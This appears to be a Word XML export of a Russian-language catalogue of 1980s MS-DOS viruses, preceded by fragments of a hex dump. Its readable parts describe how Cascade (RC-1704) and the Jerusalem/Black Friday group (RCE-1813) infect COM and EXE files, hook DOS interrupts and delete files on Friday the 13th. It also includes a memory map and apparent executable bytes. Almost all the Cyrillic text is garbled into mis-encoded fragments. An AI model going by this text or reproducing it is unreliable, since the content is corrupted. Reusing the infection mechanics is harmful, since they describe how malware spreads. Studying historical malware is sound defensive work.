E7 01 01 4E 41 49 74 03 E9  ..........NA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E0  6E FF E9 54 FF 18 50 01 01 00 00 00 00 00 00 00  n..T..P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0  0D 2D 2D 20 4D 6F 72 65 20 2D 2D 24 4D 4F 52 45  .-- More --$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  3A 20 49 6E 63 6F 72 72 65 63 74 20 44 4F 53 20  : Incorrec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0  76 65 72 73 69 6F 6E 0D 0A 24 01 FA 8B EC E8 00  version..$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0  00 5B 81 EB 31 01 2E F6 87 2A 01 01 74 0F 8D B7  .[..1....*..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0  4D 01 BC 82 06 31 34 31 24 46 4C 75 F8 34 5E 50  M....141$FLu.4^P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0  74 AB 3B 3A A1 25 3B 3B 8F 0B F6 3B 3B 68 C4 3B  t.;:.%;;...;;h.;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0  CB 71 3C 49 27 7E 2F 1D 39 3B 3B 1B 3B 1A 2B 3A  .q&lt;I'~/.9;;.;.+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... ... ... ... ... ... ... ... ... ... ... ...  ... ... ...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ਬ�� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਢ������  ����  ����  ����� १����⭠� ���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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(1E1E) ⠡���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������� �ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �� �����, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠�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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"bytes",  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥����� ����⢨⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪�� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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    Program   Parent   Sg   Bytes           Hooke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  ��������  ��  ������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A66)  DOS       N/A        3    5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1B4E)  E1840     DOS        2   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BA0)  QUICK     DOS        2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(1BC2)  KBMNA     DOS        2     480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1BE2)  DOSEDIT   DOS        2    2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(1C62)  BDS1      DOS        2    7056  00  08  09  13  1A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(1E1E)  N/A       N/A        1     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2. ����� R�-1704 (Cascade-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⠬� �⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥��� �� ��室���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢�મ� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- ����⮢�⥫� BIOS. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�����⥩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��-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. ��⥪������ ������⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN.  ����� �⠬�� 1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6A8h)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.3. ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ��᪠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᠫ��᪠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� ����稫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫�� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� �� �����㦥� �  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1987�.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤥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ᠫ��᪮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� ������� � ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪨� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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(�⠬���), �⫨������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� ࠧ��ࠬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����⢨� � ⨯�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠩��� �� ��� �������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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⭨��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">13 �᫮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��� �� 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� ᫮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �᫨ � ��� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>塞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᪠���� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠��� 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 ��  ����⪥ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>୮�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ �⮩ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MS DOS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ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ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩 䠩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設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫�� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,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 ⥫� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �� � ����, ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨� ��㯯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1 ����� RCE-1813 (Ierusalem     - ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠫ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raeli Virus - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��᪨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ack Friday  - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ୠ� ��⭨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R��-1813 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Black Friday - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ୠ� ��⭨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᫨ 13 �᫮ ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���� �� ��⭨��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤠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᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���⮬� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥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࠭����� �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Israeli Virus - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��᪨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R��-1813 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩����  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ⠪ � ���-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS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ன �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭪樮�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ������ ��-��������,  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��ᯮᮡ�� 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稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.0.</w:t>
        <w:tab/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM, ⠪ � EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �� ����㧪� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-4Bh),  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� �� ����� 䠩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ᬮ�७�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ���⮬� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭨�⮦��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ������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� �ॢ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64K.  ����� ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>8h � 2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⨯� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �⮬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ᮧ����� �� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1813 ���⮢.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�� �ணࠬ�� ⥫� ����� ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥��� � ��砫� 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ����� �뤥��� ������� �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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int 21h,  ah=48h),  � ������ ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �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� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ ��ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �����뢠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��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>5 ���⮢��� ���� (���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 �� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"MsDos"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⠬�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㣨� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ��������� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ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ᮬ � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਧ���� ��ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-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⨯� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன ࠧ�����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ࠧ��஢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���⨣���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 ����⨬��� ��� ������ ��設�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���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  Norton Commander ����� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>500�)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⮬ ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ����� �� ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ����� �� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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稢�����  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1808 - 1823 ����.  ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥��� ���筮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,  ������ � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �᫨ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� ����� �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(��  ����� ����,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>拉 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 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᢮��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥ ���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥ ��� �࠭���� �஬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),  � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥��� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䥪� ��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BASE,  QC � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鸞 ��㣨� ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ ����  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��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥ ���� ��� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥣ��  �������  ����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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠� �㤠 ���祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1984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 �� ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�.  ����).  ��� ����� �� �⮩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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� � ������ ����� ���墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>08  �  21. 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⮣�  ���  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">R��-1813 �⠫ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ��⠥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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믮������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ�� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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����� � ����� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �᫨ ��� ����, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ����� ��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� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �᫨ �� ���, � ����� ���⠫������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮���� 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騥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���������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� ⥫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ���⮢ ����� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>003F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003FE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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥� �� 㪠����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ �ணࠬ�� ����஢����  � ��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ࠢ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��  �����஢����  ��६�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">頥�  ⥫� ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤥����� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᭮���� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�� �⮬ ����� � COM-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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ � ᥡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � � EXE-�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��ࠥ� ���� ���� �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) � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ����� � 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����⠭��������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥  ᮤ�ন���  ���⮢  �����  �  ���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3FCh-003FE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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।����  ���  �᭮���� �ணࠬ�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭪樥� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXEC (21-4Bh)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� �� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�.�.  � ����� �������� � ��� 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 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮���� �ணࠬ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��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��� �ணࠬ�� ����� �᢮������� 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⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-31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१ �����஥ �६� ��᫥ ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ��� ����� �⠫ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ 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६�  ������  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪⮢��  ����� ��� � ��� ������ ��/�� � ⠪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⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4.77 ��� ��⠢��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">浪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>40 ���.),  ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �⠤�� ������ ������� ����� ������ �� ���� �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� "�����" ����, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騩�� �� ��⭨��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮢ�������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13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���� ������� ����� ��⮨� � ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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뤠� �� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DIR �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ���� �  ����������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮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 �� �࠭</w:t>
